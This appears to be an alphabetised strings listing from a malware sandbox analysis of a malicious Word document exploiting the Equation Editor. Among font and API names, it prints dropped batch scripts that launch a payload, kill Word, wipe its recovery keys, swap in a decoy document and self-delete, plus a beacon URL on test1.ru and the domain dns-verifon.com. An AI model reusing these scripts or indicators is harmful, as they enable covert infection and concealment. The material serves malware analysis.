Constantia

Unicode based on Runtime Data (WINWORD.EXE )

Cooper Black

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Copperplate Gothic Light

Unicode based on Runtime Data (WINWORD.EXE )

Coproduct with no limits Coproduct with underscript limit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

CoproductLambda bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

copy %temp%\decoy.doc "%AppPath%"

Ansi based on Dropped File (2nd.bat)

copy %TeMp%\DeCoY.DoC "%AppPath%"

Ansi based on Dropped File (2nd.bat)

CopyFileW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Corbel

Unicode based on Runtime Data (WINWORD.EXE )

Cordia New

Unicode based on Runtime Data (WINWORD.EXE )

CordiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Courier

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Courier New

Unicode based on Runtime Data (WINWORD.EXE )

CreateInsitu Failed

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

cript ellMinus or plus

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Curlz MT

Unicode based on Runtime Data (WINWORD.EXE )

CustomZoom

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

D]=^`_`}B26'YGLrBPK!Mword/fontTable.xmlMn0z9"=MSQo)+#J!<|x/)*!|H;

Ansi based on Dropped File (~WRC0000.tmp)

daaJment

Ansi based on Image Processing (screen_3.png)

daalment

Ansi based on Image Processing (screen_3.png)

DaunPenh

Unicode based on Runtime Data (WINWORD.EXE )

David

Unicode based on Runtime Data (WINWORD.EXE )

DDd8J.= PackageEMBED= PackageEMBED= PackageEMBED= PackageEMBED= PackageEMBED= \a Word.Document.8DFL^d~&,>D^dv|28XBFR j<CJOJQJU^JaJ<CJOJQJ^JaJCJOJQJ^JaJjCJOJQJU^JaJ& "%TMp%\\InTeLdRiVeRuPd1.ScT" "ew:{00000000-0000-0000-0000-000000000000}"LINK= Equation.3EMBED = Equation.3EMBEDINCLUDEPICTURE "http://test1.ru/newbuild/t.php?stats=send&thread=0" MERGEFORMAT \d \w0001 \h0001 \pm1 \px0 \py0 \pw0 \x \ywDf2http://test1.ru/newbuild/t.php?stats=send&thread=0

Ansi based on Dropped File (~WRS{E674B11D-078C-4013-8D68-BC57AFC19CCF}.tmp)

Del "%~f0"

Ansi based on Dropped File (task.bat)

DeL %TMp%\block.TxT

Ansi based on Dropped File (2nd.bat)

DeL %TMp%\decoy.DoC

Ansi based on Dropped File (2nd.bat)

DeL %TMp%\inteldriverupd1.ScT

Ansi based on Dropped File (2nd.bat)

DenomDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

description="fjzmpcjvqp"

Ansi based on Dropped File (inteldriverupd1.sct)

Design Science, Inc. 1990-2000

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

Digital Signature Trust Co.1

Ansi based on PCAP Processing (network.pcap)

DilleniaUPC

Unicode based on Runtime Data (WINWORD.EXE )

DISPLAY

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

dns-verifon

Ansi based on PCAP Processing (network.pcap)

dns-verifon.com

Ansi based on PCAP Processing (network.pcap)

dns-verifon.com0

Ansi based on PCAP Processing (network.pcap)

DokChampa

Unicode based on Runtime Data (WINWORD.EXE )

DOMAIN error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Dotum

Unicode based on Runtime Data (WINWORD.EXE )

DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

Double arrow (both directions)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Double arrow under-bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Double arrow up and down

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Down diagonal ellipsis

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

DS Equation

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

DST Root CA X30

Ansi based on PCAP Processing (network.pcap)

dXiJ(x$(:;!I_TS1?E??ZBmU/?~xY'y5g&/>GMGeD3Vq%'#q$8K)fw9:

Ansi based on Dropped File (~WRC0000.tmp)

E&xit and Return to %s

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

e.|,H,lxIsQ}# +!,^$j=GW)E+&

Ansi based on Dropped File (decoy.doc)

E@Sc. 6%pn5$CcT< /ANQxDS#\r""`t\Ss%=tD]1eA

Ansi based on Dropped File (decoy.doc)

Ebrima

Unicode based on Runtime Data (WINWORD.EXE )

ECHO OFF

Ansi based on Dropped File (task.bat)

ECHO OFFset uu="%TMp%\block.txt"IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)Del "%~f0"exit

Ansi based on Dropped File (task.bat)

ECHO OFFTIMEOUT 1start %TeMp%\ExE.ExEtaskkill /f /im WiNwOrD.ExEreg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /freg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /ffor /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %TeMp%\DeCoY.DoC "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%"for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"copy %temp%\decoy.doc "%AppPath%""%AppPath%"DeL %TMp%\block.TxTDeL %TMp%\inteldriverupd1.ScTDeL %TMp%\decoy.DoC

Ansi based on Dropped File (2nd.bat)

Editing

Ansi based on Image Processing (screen_6.png)

Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Edwardian Script ITC

Unicode based on Runtime Data (WINWORD.EXE )

eeintl.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Elephant

Unicode based on Runtime Data (WINWORD.EXE )

Ellipsis

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

em\currentcontrolset\control\keyboard layout

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Embed Source

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Embedded Object

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

embedding

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

EmbellGap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

en-US

Unicode based on Runtime Data (WINWORD.EXE )

EnableConsoleTracing

Unicode based on Runtime Data (exe.exe )

EnableFileTracing

Unicode based on Runtime Data (exe.exe )

Engravers MT

Unicode based on Runtime Data (WINWORD.EXE )

enter

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

EO/)F;@Z$I2Uz<uLULhd6Xwf#3;"e3Y.s&KS[nA2{

Ansi based on Dropped File (~WRC0000.tmp)

EqnEdt32.EXE

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

eqnedt32.reg

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

EqnFrameWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

EQNINSITUCLASS

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

EQNWINCLASS

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

equation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation

Unicode based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation Editor

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation Editor 2.0 Windows Application

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Equation Editor Tip

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation Editor's equation memory is running low. Close some Equation Editor windows or reduce the contents of open Equation Editor windows, perhaps by transferring them to documents.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation Native

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Equation(Unable to write preferences to registry.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Equation.3\protocol\StdFileEditing\server

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Equation3

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

EquationEditorFilesIntl_1033

Unicode based on Runtime Data (EQNEDT32.EXE )

EquationWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Eras Bold ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Demi ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Light ITC

Unicode based on Runtime Data (WINWORD.EXE )

Eras Medium ITC

Unicode based on Runtime Data (WINWORD.EXE )

Estrangelo Edessa

Unicode based on Runtime Data (WINWORD.EXE )

EucrosiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Euphemia

Unicode based on Runtime Data (WINWORD.EXE )

ExitProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ext . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ext . . . . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

F Microsoft Word 97-2003

Ansi based on Dropped File (decoy.doc)

f^]Y-.CDtv5w>AvjW0zt*yPkGaJaxoI ;@"r+6

Ansi based on Dropped File (~WRC0000.tmp)

FangSong

Unicode based on Runtime Data (WINWORD.EXE )

fao.b*lIrj),l0%b

Ansi based on Dropped File (~WRC0000.tmp)

Fatal Exit

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

FatalAppExitA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Fd` # h1

Ansi based on Dropped File (~WRC0000.tmp)

Felix Titling

Unicode based on Runtime Data (WINWORD.EXE )

FenceOver

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Fences

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

field

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FileDirectory

Unicode based on Runtime Data (exe.exe )

FileTracingMask

Unicode based on Runtime Data (exe.exe )

FindClose

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindFirstFileA

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindNextFileW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindResourceA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

fldinst

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

fldrslt

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FltToolbarWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

FMDFontListEnum

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

FMDFontProtoEnum

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

FontInfoCacheW

Unicode based on Runtime Data (WINWORD.EXE )

Fonts

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

fonttbl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footer

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footerf

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footerl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

footerr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Footlight MT Light

Unicode based on Runtime Data (WINWORD.EXE )

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"

Ansi based on Dropped File (2nd.bat)

ForceOpen

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

FormatMessageA

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FOrmatPaintir

Ansi based on Image Processing (screen_3.png)

Forte

Unicode based on Runtime Data (WINWORD.EXE )

FractBarOver

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FractBarThick

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Franklin Gothic Book

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Demi Cond

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Heavy

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium

Unicode based on Runtime Data (WINWORD.EXE )

Franklin Gothic Medium Cond

Unicode based on Runtime Data (WINWORD.EXE )

FrankRuehl

Unicode based on Runtime Data (WINWORD.EXE )

FreeLibrary

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

FreeResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

FreesiaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Freestyle Script

Unicode based on Runtime Data (WINWORD.EXE )

French Script MT

Unicode based on Runtime Data (WINWORD.EXE )

ft Equation Editor

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Function

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

FX)bkENi0C^P7z`E<)G]9/gI4g<eI["4m?6qkb0S#jpI |wXPK!N_rels/.rels (JAa}7

Ansi based on Dropped File (~WRC0000.tmp)

G;7A["&{)TKs u>4SUvI7q6&tp/`#34#6*UOj&=S|y8}QjDzG4wDFzG4JwDzG4;tvz@-;'{n:PV=$,8epj9=\,Y"vgF;{&

Ansi based on Dropped File (~WRC0000.tmp)

Gabriola

Unicode based on Runtime Data (WINWORD.EXE )

galCopyright

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Garamond

Unicode based on Runtime Data (WINWORD.EXE )

Gautami

Unicode based on Runtime Data (WINWORD.EXE )

General

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Georgia

Unicode based on Runtime Data (WINWORD.EXE )

GetACP

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetActiveWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetCommandLineA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCPInfo

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetFileAttributesW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetFullPathNameW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetLastActivePopup

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLocaleInfoA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetLocalTime

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetModuleFileNameA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetModuleHandleA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetProfileStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetStartupInfoA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemDefaultLangID

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemDirectoryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemTime

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetTickCount

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetTimeZoneInformation

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetVersion

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GetWindowsDirectoryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

gHjo6UC@l]"Zpc#._fReK+/22t+#V7ZD/,j0&BOi`|a@@8*^>^Q%rjc,e+='GU.k&x=&XHd%=

Ansi based on Dropped File (~WRC0000.tmp)

Gill Sans MT

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans MT Ext Condensed Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold

Unicode based on Runtime Data (WINWORD.EXE )

Gill Sans Ultra Bold Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Gino/<<1A$>"f3\TISWY

Ansi based on Dropped File (~WRC0000.tmp)

Gisha

Unicode based on Runtime Data (WINWORD.EXE )

GlobalAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalFlags

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalHandle

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalLock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalReAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalSize

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalUnlock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Gloucester MT Extra Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Goudy Stout

Unicode based on Runtime Data (WINWORD.EXE )

Greek . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Greek characters (uppercase)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Gulim

Unicode based on Runtime Data (WINWORD.EXE )

GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

H bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

H:?@@

Ansi based on Dropped File (exe.exe.634531026)

H=%s, W=%s, B=%d-Some resources are missing from EQNEDT32.EXE.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Haettenschweiler

Unicode based on Runtime Data (WINWORD.EXE )

Harlow Solid Italic

Unicode based on Runtime Data (WINWORD.EXE )

Harrington

Unicode based on Runtime Data (WINWORD.EXE )

header

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

headerf

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

headerl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

headerr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

HeapAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

HeapCreate

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

HeapDestroy

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

HeapFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Help index

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Helvetica

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Helvetica-Bold

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Helvetica-BoldOblique

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Helvetica-Oblique

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

High Tower Text

Unicode based on Runtime Data (WINWORD.EXE )

hmhS*NLhmhm5B*CJOJPJQJ\^JaJfHnHph333q

Ansi based on Dropped File (decoy.doc)

hostmaster

Ansi based on PCAP Processing (network.pcap)

how &All

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

http://cps.letsencrypt.org0

